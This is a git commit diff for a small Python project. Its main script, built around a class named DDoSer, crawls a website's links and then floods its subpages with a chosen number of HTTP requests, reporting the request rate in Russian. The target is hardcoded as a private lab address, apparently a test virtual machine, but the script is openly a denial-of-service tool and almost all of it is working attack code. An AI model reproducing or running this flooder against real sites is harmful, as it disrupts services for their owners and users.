faster_than_requests

This commit is contained in:
2020-04-25 00:33:39 +03:00
parent 6de8735eb5
commit 53c9a0f8f3
2 changed files with 41 additions and 39 deletions

4
.gitignore vendored
View File

@@ -2,4 +2,6 @@
./venv
./vscode
./data.db
./__pycache__
./__pycache__
./map.txt
./maps

76
__init__.py Normal file → Executable file
View File

@@ -1,11 +1,11 @@
#!venv/bin/python3
import os
import link_extractor
import time
import random
import progressbar
# import urllib.request as requests # urlib
# import faster_than_requests as requests # faster_than_requests
import requests
import faster_than_requests as requests
from datetime import datetime
from threading import Thread
@@ -13,27 +13,27 @@ from threading import Thread
global requestCountSuccess, requestCountExecuted
if not os.path.exists('./maps/'):
os.makedirs('./maps/')
os.makedirs('./maps/')
def url_grab(full_url):
if os.path.exists(f'./maps/{url}'):
if os.path.exists(f'./maps/{url}'):
with open(f'./maps/{url}', 'r') as f:
subUrls = f.read().splitlines()
else:
with open(f'./maps/{url}', 'r') as f:
subUrls = f.read().splitlines()
else:
subUrls = link_extractor.extractor('http://' + url)
subUrls = link_extractor.extractor('http://' + url)
os.mknod(f'./maps/{url}')
with open(f'./maps/{url}', 'w') as f:
for link in subUrls:
print(link.strip(), file=f)
os.mknod(f'./maps/{url}')
with open(f'./maps/{url}', 'w') as f:
for link in subUrls:
print(link.strip(), file=f)
print(datetime.now().strftime('[%X] ') + 'Карта сайта получена')
return subUrls
print(datetime.now().strftime('[%X] ') + 'Карта сайта получена')
return subUrls
class DDoSer(Thread):
@@ -46,8 +46,8 @@ class DDoSer(Thread):
global requestCountSuccess, requestCountExecuted
# responce = requests.urlopen(self.url).getcode() # urlib
responce = requests.get(self.url).status_code
if responce == 200:
responce = requests.get(self.url)['status']
if responce == '200 OK':
requestCountSuccess += 1
requestCountExecuted += 1
@@ -55,29 +55,29 @@ class DDoSer(Thread):
if __name__ == '__main__':
# url = input(datetime.now().strftime('[%x %X] ') + 'Введите адрес сайта: ')
url = '192.168.56.102'
# url = input(datetime.now().strftime('[%x %X] ') + 'Введите адрес сайта: ')
url = '192.168.56.102'
subUrls = url_grab(url)
subUrls = url_grab(url)
requestCount = int(input(datetime.now().strftime('[%X] ') + 'Введите число запросов: '))
print()
requestCount = int(input(datetime.now().strftime('[%X] ') + 'Введите число запросов: '))
print()
startTime = time.time()
requestCountExecuted = 0
requestCountSuccess = 0
startTime = time.time()
requestCountExecuted = 0
requestCountSuccess = 0
with progressbar.ProgressBar(max_value=requestCount) as bar:
for i in range(requestCount):
url = random.choice(subUrls)
thread = DDoSer(url)
thread.start()
thread.join()
bar.update(requestCountExecuted)
while requestCountExecuted < requestCount:
bar.update(requestCountExecuted)
with progressbar.ProgressBar(max_value=requestCount) as bar:
for i in range(requestCount):
url = random.choice(subUrls)
thread = DDoSer(url)
thread.start()
thread.join()
bar.update(requestCountExecuted)
while requestCountExecuted < requestCount:
bar.update(requestCountExecuted)
print('\n' + datetime.now().strftime('[%X] ') + 'Всего выслано запросов: ' + str(requestCountExecuted))
print(datetime.now().strftime('[%X] ') + 'Успешных запросов: ' + str(requestCountSuccess))
print(datetime.now().strftime('[%X] ') + 'Средняя скорость: ' + str(round(requestCountExecuted/(time.time() - startTime))) + ' з/с')
print('\n' + datetime.now().strftime('[%X] ') + 'Всего выслано запросов: ' + str(requestCountExecuted))
print(datetime.now().strftime('[%X] ') + 'Успешных запросов: ' + str(requestCountSuccess))
print(datetime.now().strftime('[%X] ') + 'Средняя скорость: ' + str(round(requestCountExecuted/(time.time() - startTime))) + ' з/с')